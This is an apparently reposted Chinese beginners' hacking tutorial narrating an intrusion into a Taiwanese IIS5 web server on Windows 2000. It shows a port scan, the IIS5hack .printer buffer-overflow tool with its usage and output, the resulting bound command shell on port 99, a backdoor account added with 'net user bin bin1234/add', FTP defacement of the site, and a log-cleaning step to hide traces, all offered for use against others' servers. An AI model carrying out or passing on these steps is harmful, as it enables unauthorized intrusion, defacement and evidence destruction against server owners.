一.前言
　　哈哈~大家好,我Bytes由來給大家寫教程了,哦~對不起,呵呵,去臺灣轉了一下還沒把輸入法條過來,少等^!^……(Ctrl+Shift)
　　呵呵~现在一切正常.首先申明,本文不是什么"宝典武学".
　　我给大家说说现在最时髦的入侵IIS5的手法(什么这也有流行时尚??!).现在的IIS5NULL.printer边界监测问题的缓冲区溢出的漏洞实在是比比皆是,国内如此国外也一样..SUNx的IIs5hack,这一工具能很好的帮助你完成攻击任务!(明白了吧~~本文是写给初学者看的!不要以为学会这些就可以妄称黑客!)过几天我给狂刀兄让他传上来,给大家用用(怎么样??Bytes很不错吧,大\好人呀)
　　二.过程
　　言归正传,开始我们今天的攻击任务.
　　目标:www.xxx.com.tw(马赛克处理,我可不想被人骂~~~哈哈哈)
　　web server:Microsoft IIS/5.0
　　OS: win2k
　　嗯~先扫一下他开放端口先(这是通常情况下的攻击第一部):
　　Open 21(ftp)!!!
　　Open 23(telnet)!!!(靠!win2k开着telnet,呵呵~不错)
　　Open 25(stmp)!!!
　　Open 79(finger)!!!(我喜欢!哈哈)
　　Open 80 (http)!!!
　　Open 110(pop)!!!
　　Open 3389 (unknow)!!!(呵呵~想必这个没用,呵呵~)
　　ALL DONE!!!(完毕)
　　嗯~ftp应该是5.0版本的,win2k嘛~应该没什么厉害的漏洞.
　　不管怎样telnet上去看看先:
　　开始->运行->(本地菜单)输入:telnet www.xxx.com.tw
　　
　　嗯~怎么还不出来?光标还在动.."连接丢失!"(My Dod!!!!这是一个伪端口,或者石有防火墙!)看来telnet行不通.
　　finger看看,特telnet www.xxx.com.tw 79:
　　"无法连接!"
　　我昏~什么破扫描啊~哦~忘记了不能骂作者的,因为好像这个是我自己写的,没打算发表,烂了点!呵呵~
　　那么只好暴力一点从80(http)突破了~呵呵~(怎么像有在偷看MM洗澡的感觉?!)
　　扫一下看看Unicode怎么样:
　　No Found!!
　　All Done!
　　哈哈~我好霉气~5555555555(TMD,God跟我开玩笑吧?)
　　嗯~咦~对了不是有NULL.printer的溢出程序吗??哈哈~你还不死,这个漏洞很新的,想必你没补..(偷看人家洗澡怎么还走进去?!)
　　哈哈!我运气好!先把IIS5hack.exe解压缩,改名成"IIS.exe"(名字短一点,我很懒的..hehe),放到Winnt目录下(这个程序可以在win9x/winNT/win2k运行),这样可以把它当作一个windows组件用.(win9x用户,你可以放到windows目录).
　　start..
　　开始->运行->(本地菜单)输入:iis(看一下用法先)
　　iis5 remote .printer overflow. writen by sunx
　　http://www.sunx.org
　　for test only, dont used to hack, :p
　　
　　usage: C:\WINDOWS\IIS.EXE
　　
　　chinese edition: 0
　　chinese edition, sp1: 1 #(对付中文版,sp1就不用我说什么意思了吧??呵呵~Unix类的系统用多了~"#"注译改不过来!)
　　english edition: 2
　　english edition, sp1: 3 #(对付E文版)
　　japanese edition: 4
　　japanese edition, sp1: 5#(对付日文版)
　　好~Let me do it!......
　　开始->运行->(本地菜单)输入:iis www.xxx.com.tw 80 1 (tw的服务器,当然是中文的,该程序简体繁体不区分)
　　iis5 remote .printer overflow. writen by sunx
　　http://www.sunx.org
　　for test only, dont used to hack, :p
　　
　　
　　connecting...
　　sending...
　　Now you can telnet to 99 port
　　good luck :)
　　好~我们telnet 99来看一看!
　　Microsoft Windows 2000 [セ 5.00.2195]
　　(C) Copyright 1985-2000 Microsoft Corp.
　　
　　C:\WINNT\system32>
　　哈哈哈哈哈~好极了,绑定了一个cmdshell,接着来:
　　Microsoft Windows 2000 [セ 5.00.2195]
　　(C) Copyright 1985-2000 Microsoft Corp.
　　
　　C:\WINNT\system32>net user
　　\\ ㄏノ眀め
　　
　　-------------------------------------------------------------------------------
　　Administrator Guest
　　IUSR_BIG IWAM_BIG TsInternetUser
　　磅︽Ч拨祇ネ┪岿粇
　　
　　呵呵,这么几个用户,不过现在我应该是system用户权限才是,呵呵~添加一
　　个用户先
　　Microsoft Windows 2000 [セ 5.00.2195]
　　(C) Copyright 1985-2000 Microsoft Corp.
　　
　　C:\WINNT\system32>net user
　　\\ ㄏノ眀め
　　
　　-------------------------------------------------------------------------------
　　Administrator Guest
　　IUSR_BIG IWAM_BIG TsInternetUser
　　磅︽Ч拨祇ネ┪岿粇
　　C:\WINNT\system32>net user bin bin1234/add (注意这是在攻击目标上运行)
　　net user bin bin1234/add
　　
　　C:\WINNT\system32>
　　先别退出,在开一个ftp,你就可以用bin/bin1234这个刚刚注册的用户登陆上去,修改了..别忘记load一个cleanLOG的东西,擦擦你的PP ^!^ (出事别怪我没和你说)
　　ftp修改了对方网页后,然后在切换回telnet
　　
　　Microsoft Windows 2000 [セ 5.00.2195]
　　(C) Copyright 1985-2000 Microsoft Corp.
　　
　　C:\WINNT\system32>net user
　　\\ ㄏノ眀め
　　
　　-------------------------------------------------------------------------------
　　Administrator Guest
　　IUSR_BIG IWAM_BIG TsInternetUser
　　磅︽Ч拨祇ネ┪岿粇
　　C:\WINNT\system32>net user bin bin1234/add (注意这是在攻击目标上运行)
　　net user bin bin1234/add
　　
　　C:\WINNT\system32>c:\inetpub\wwwroot\cleanLOG.exe(一般你上传就在这个目录下,注意cleanLOG是我假设的.运行他,擦擦咱的PP)
　　C:\WINNT\system32>exit(做完了,走人??
　　
　　过几天大家来本站找iis5hack用吧,呵呵~~最后谢谢大家看我的文章..
　　~~~~~~~BB
　　

文章转载地址：http://www.cnpaf.net/Class/hack/0610111049153700296.html